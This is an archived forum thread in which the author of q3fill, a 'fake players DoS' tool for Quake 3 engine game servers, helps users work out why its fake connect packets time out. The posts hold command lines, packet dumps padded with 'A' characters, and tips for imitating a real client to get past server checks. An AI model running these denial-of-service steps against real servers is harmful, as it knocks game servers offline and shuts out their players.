Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 13:06

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 21 posts ] 
Author Message
 Post subject: q3fill socket error
PostPosted: 09 Sep 2008 12:19 

Joined: 09 Sep 2008 12:15
Posts: 27
Using Vista:

Code:
C:\**\q3fill>q3fill.exe -n -b -t 4  -v -V -u -1 -T XXXX XX

Quake 3 engine fake players DoS 0.4.3a
by Luigi Auriemma
e-mail: aluigi@autistici.org
web:    aluigi.org

- open file q3fill.ini
- target 
- retrieve informations
..
                       challenge xxx
                        protocol 82
                        hostname XXXXXX
                       serverload 10
                         mapname oasis
                         clients 17
                   sv_maxclients 30
                        gametype 2
                            pure 1
                            game etpub
               sv_allowAnonymous 0
                    friendlyFire 0
                        maxlives 0
                        needpass 0
                      punkbuster 1
                        gamename et
                       g_antilag 1
                    weaprestrict 100
                   balancedteams 1

- parameters in use:
  compression   on
  protocol      82
  punkbuster    on
  password      off
  key/guid      random

- Fake players:

     Player: .. "umgah"
????????connect "\challenge\-2052723004\qport\2905\protocol\82\cl_guid\XXXXXXXXXXXX\cl_punkbuster\1
\snaps\10\rate\1500\name\umgah\model\none\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAA\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A"
- compressed 1037 bytes to 271
...
Error: socket timeout, no reply received


Any idea why? Is their anyway to use the cl_guid which i want instead of random?


Top
 Profile  
 
 
 Post subject: Re: q3fill socket error
PostPosted: 09 Sep 2008 13:32 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
it can be a mod which adds a similar protection, this is the only hypothesis to which I can think because my patch returns a "protocol version" error so this is not the case.

for the cl_guid thing at the moment there is a bug which I need to fix, anyway -m "cl_guid\whatyouwant"

FYI, I don't know if you have removed it while hiding the IP but -T needs a value after it (seconds between each player)


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 09 Sep 2008 13:48 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
give the server info (ip-port) and ill test it. ..if u dont want to put ip in public then you can pm it to me and ill update results here.


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 09 Sep 2008 13:53 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I have just solved the bug, was in -g


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 09 Sep 2008 19:46 

Joined: 09 Sep 2008 12:15
Posts: 27
So, their would be update version soon? I dont need to hide IP because its my server and sethioz u got the PM.


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 09 Sep 2008 20:38 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
the new version is already online (0.4.4).
for using a custom cl_guid field use: -g -m "\cl_guid\YOUR_GUID"

while for the problem of the timeout at the moment I don't have other ideas.
you can try to use the -m option followed by other long parameters tested sequentially till a total of 1024 bytes


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 09 Sep 2008 22:31 

Joined: 09 Sep 2008 12:15
Posts: 27
aluigi wrote:
the new version is already online (0.4.4).
for using a custom cl_guid field use: -g -m "\cl_guid\YOUR_GUID"

while for the problem of the timeout at the moment I don't have other ideas.
you can try to use the -m option followed by other long parameters tested sequentially till a total of 1024 bytes


Can you explain little more how to use - m option and i am also confused with the -w PWD option.


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 09 Sep 2008 22:47 

Joined: 09 Sep 2008 12:15
Posts: 27
Tried same error.
Code:
     Player: .. "umgah"
????????connect "\challenge\1125538781\qport\46573\protocol\82\cl_guid\44029910ED377
F6897F04837B4029D71\cl_punkbuster\1\snaps\10\rate\1500\name\umgah\model\none\AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- compressed 1037 bytes to 272
...
Error: socket timeout, no reply received


Was more thinking of PB problem. Because mostly PB kicks with 10 snaps and 1500 rate. If 20 and 25000 would be adjusted will it work?


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 09 Sep 2008 23:48 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
rate and snaps can't be customized, they are automatically setted by the tool.

you could try to use the -B option which is specific for the ET games although a bit complex to use.
use q3fill -B help for all the informations about it and the step-by-step for testing it


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 10 Sep 2008 10:39 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
yeah it gives same error. getting server info only...

Code:
>q3fill -v -g x.x.x.x 279xx

Quake 3 engine fake players DoS 0.4.3
by Luigi Auriemma
e-mail: aluigi@autistici.org
web:    aluigi.org

- target   x.x.x.x : 279xx
- retrieve informations
..                       challenge xxx
                        protocol 82
                        hostname xxxxxxxxxxxxxxxxxxxx
                      serverload 4
                         mapname oasis
                         clients 14
                   sv_maxclients xx
                        gametype 4
                            pure 1
                         maxPing 500
                            game etpub
               sv_allowAnonymous 0
                    friendlyFire 1
                        maxlives 0
                        needpass 0
                      punkbuster 1
                        gamename et
                       g_antilag 1
                    weaprestrict 100
                   balancedteams 1

- parameters in use:
  compression   on
  protocol      82
  punkbuster    on
  password      off
  key/guid      random

- Fake players:

     Player: .. "Ldiqzr2rFUCzwIkHYohx5kU6Gie4w"
    connect "\challenge\1947014746\qport\57484\protocol\82\cl_punkbuster\1\cl_an
onymous\0\snaps\10\rate\1500\name\Ldiqzr2rFUCzwIkHYohx5kU6Gie4w\model\none"
- compressed 155 bytes to 150
...
Error: socket timeout, no reply received


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 10 Sep 2008 21:45 

Joined: 09 Sep 2008 12:15
Posts: 27
Can u modify the tool so that it uses the new rate instead of old ones?

Just an idea..also new the version crashes.. and i sended u in PM the bug report.


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 10 Sep 2008 22:43 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
if you don't give me the full command-line you used I can't replicate the problem and so I can't fix it


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 11 Sep 2008 00:30 

Joined: 09 Sep 2008 12:15
Posts: 27
Thanks


Last edited by qfill on 11 Sep 2008 03:06, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 11 Sep 2008 01:09 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I have released a new version (http://aluigi.org/fakep.htm#q3fill), try this one and let me know if the problem continues. thanx


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 11 Sep 2008 02:27 

Joined: 09 Sep 2008 12:15
Posts: 27
Thanks


Last edited by qfill on 11 Sep 2008 03:05, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 11 Sep 2008 02:39 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
im diggin' the username; 'qfill'
lol.


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 11 Sep 2008 02:53 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
qfill follow the step-by-step visualized with -B help and try with that option


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 11 Sep 2008 03:05 

Joined: 09 Sep 2008 12:15
Posts: 27
Well not working somehow. I thought it was but isn't.

Code:
- Fake players:

     Player: .. "umgah" ....
- the server seems to use some checks over the "connect" packet so you need
  to use the -m option to look closer to a valid client of this specific game.
  For example in Jedi Knight 2 is possible to try with:
    -g -m "\forcepowers\1-1-010000000000000000\cg_predictItems\1\color1\3"
  while for the other games is required to dump the "connect" string of a
  valid client and placing the needed parameters checked by the game server in
  the -m string.
  Doing this is a joke since is possible to use my "Quake 3 testing server" tool
  or sniffing the packet and uncompressing using my q3huffdecenc tool


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 11 Sep 2008 11:22 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
probably the server uses some additional checks on the genuinity of the "connect" packet.
you must configure q3fill to use a packet which is as much as closer to the original sent by your client


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 11 Sep 2008 11:24 

Joined: 09 Sep 2008 12:15
Posts: 27
aluigi wrote:
probably the server uses some additional checks on the genuinity of the "connect" packet.
you must configure q3fill to use a packet which is as much as closer to the original sent by your client


well did, used the server log files used mac and all still no go. Trying on Jaymod 2.1.7. Use the same exact info string but still it gives me the same error.


Top
 Profile  
 
 Post subject: Re: q3fill socket error
PostPosted: 11 Sep 2008 20:59 

Joined: 05 Oct 2007 01:20
Posts: 402
Location: Florida
i thought jaymod for wolfenstein didn't really have any patches, it was just a mod


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 21 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: